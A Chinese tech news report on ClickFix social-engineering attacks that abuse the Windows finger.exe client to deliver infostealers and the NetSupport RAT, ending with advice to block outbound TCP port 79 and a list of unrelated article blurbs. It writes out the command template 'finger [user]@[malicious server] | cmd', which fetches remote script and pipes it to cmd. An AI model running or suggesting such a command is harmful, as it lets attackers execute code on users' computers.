黑客滥用古董Windows命令,40年后仍可远程毒控你的电脑
11月16日消息,科技媒体bleepingcomputer昨日(11月15日)发布报告指出,近期有黑客组织利用诞生约40年的“Finger”协议,将其作为新型ClickFix恶意软件攻击链条中的关键环节。
注:Finger协议是一种非常早期的互联网协议,诞生于上世纪70年代,主要功能是让用户查询其他用户的公开信息(如登录名、最后上线时间等)。在现代网络环境中已被基本废弃,但其客户端程序(finger.exe)仍在部分操作系统(如Windows)中保留。
攻击者利用该协议,在新型的ClickFix恶意软件攻击中,向受感染的Windows设备远程下发并执行恶意指令。Finger协议最初用于在Unix/Linux系统上查询用户信息,后来也被集成到Windows系统中。
虽然如今已鲜少有人使用,但其作为系统原生工具的特性,使其成为一种理想的“原生二进制程序(LOLBIN)”,能有效规避部分安全软件的检测机制。
攻击的核心在于社会工程学欺骗。攻击者会通过各种方式(如网页弹窗)显示一个伪造的“人机验证”提示,诱导用户按下Win+R快捷键并输入一行看似无害的命令。

该命令格式通常为 finger [用户名]@[恶意服务器地址] | cmd。一旦用户执行,Windows系统内置的finger.exe程序便会向指定服务器发起请求,而服务器返回的并非用户信息,而是一段预设的恶意脚本。
通过管道符 |,该脚本的输出被直接传递给Windows命令处理器cmd.exe执行,从而完成恶意代码的远程投递。

恶意脚本执行后,会立即展开一系列后续动作。它首先会创建一个随机命名的路径,并下载一个伪装成PDF文件的ZIP压缩包。解压后,其中的恶意载荷便会被激活。

根据分析,这些载荷主要分为两类:一类是专门用于窃取用户密码、浏览器记录等敏感数据的信息窃取程序(Infostealer);另一类则是功能更强大的NetSupport Manager远程访问木马(RAT),一旦植入,攻击者便能完全控制受害者的计算机。
为实现持久化,该脚本还会创建一个计划任务,确保恶意软件在用户每次登录系统时都能自动运行。

研究人员发现,这种攻击手法还在不断演变。在一些更新的攻击案例中,恶意脚本在执行核心任务前,会先扫描受害者电脑中是否存在常见的恶意软件分析工具。

这些工具包括Process Monitor、Wireshark、Fiddler、OllyDbg等数十款。如果检测到任何一款分析工具正在运行,脚本会立即终止执行,从而增加安全研究人员对其进行分析和追踪的难度。
由于此类攻击依赖于Finger协议进行通信,而该协议使用专门的TCP 79端口,因此防御策略也相对明确。对于绝大多数企业和个人用户而言,Finger协议并无实际用途。因此,系统管理员和安全防护人员应在网络防火墙上阻止所有出站到TCP 79端口的流量。
相关攻略
微软向WindowsInsider推送Win11最新预览版,新增“屏幕色调”辅助功能以降低亮度,讲述人支持即插即用盲文显示器,语音访问加入语音隔离技术以提升识别率并保障隐私。此次更新聚焦无障碍体验优化与智能交互的精准安全。
Mac版Teams应用频繁弹窗请求定位权限,微软确认问题源于近期macOS安全更新导致应用无法保存用户设置。目前微软与苹果正协同排查,寻求根本解决方案,并评估从应用端优化的可能。受影响系统包括macOS多个版本,但范围有限。用户可尝试在系统设置中重置相关定位权限以暂时缓解问题。
2026年4月27日,微软针对Windows 11 24H2版本推出了一项关键的电源管理优化,重点改进了“现代待机”(Modern Standby)机制。简而言之,系统默认的电源策略变得更加主动和高效——当设备处于闲置状态时,屏幕关闭和系统进入睡眠模式的速度将显著提升,从而有助于节省电力。 具体而言
微软官方通知邮箱被不法分子长期滥用,用于发送伪装成安全提醒的诈骗邮件。该漏洞使诈骗者能通过注册账号冒用官方渠道,误导性极强。尽管问题已持续数月并被外部组织通报,微软至今未彻底解决。此类利用企业官方系统进行诈骗的现象日益增多,已成为行业共同面临的安全挑战。
微软内部警示GitHub面临生存风险,因AI编程工具正削弱代码托管必要性。微软虽以Copilot引领AI编程,但竞争对手产品快速发展,重塑开发者工作流。微软内部试用后强制转向自家工具,旨在控制成本并巩固生态。同时,OpenAI考虑自建托管平台,进一步威胁GitHub根基。AI正深刻改变代码生成与管理方式。
热门专题
热门推荐
英特尔下一代TitanLake处理器全系支持LPDDR6内存。面向主流笔记本的U、P及高能效PX系列还将兼容LPDDR5X与DDR5,为设备设计提供灵活性。U、P、PX系列采用Intel18A工艺的新CPU模块,而B、BX系列沿用旧架构。高端PX系列集成GPU采用台积电N2P工艺,配备16个Xe核心,旨在提升图形性能。
一只鲸鱼做空比特币 4 96 亿美元,触发市场公信讨论 最近,链上数据捕捉到的一笔大额交易,瞬间吸引了所有市场参与者的目光:一只比特币巨鲸,悄然开立了价值近5亿美元的空单。这笔操作如同一块投入平静湖面的巨石,不仅激起了短线的价格波澜,更将市场深层的公信机制与交易透明度问题,再次推到了讨论的中心。 鲸
解锁《四海兄弟》“故乡没那么快”成就需耐心探索:深入隐秘角落,留意环境细节;积极与居民互动,收集对话线索;完成相关支线任务,关注伏笔;并注意特定时段触发的事件。成就进度可累积,坚持全面探索方能最终达成。
鬼谷子是战术型辅助,核心在于技能运用与合理出装。二技能是关键控制,配合大招的群体伪装可发起突袭。出装以冷却缩减和生存能力为主,如冷静之靴、极寒风暴和魔女斗篷。实战中需把握进场时机,从侧翼切入控制敌方核心,并注意与队友配合衔接伤害。
在游戏开发、动画制作、视频创作等数字内容领域,专业音效设计是提升作品沉浸感与专业度的关键。然而,传统音效制作流程往往依赖昂贵的专业设备与庞大的素材库,对独立开发者、小型团队及个人创作者构成了较高的技术门槛与成本压力。近期,一款名为OptimizerAI的人工智能音效生成平台备受关注,它致力于通过AI





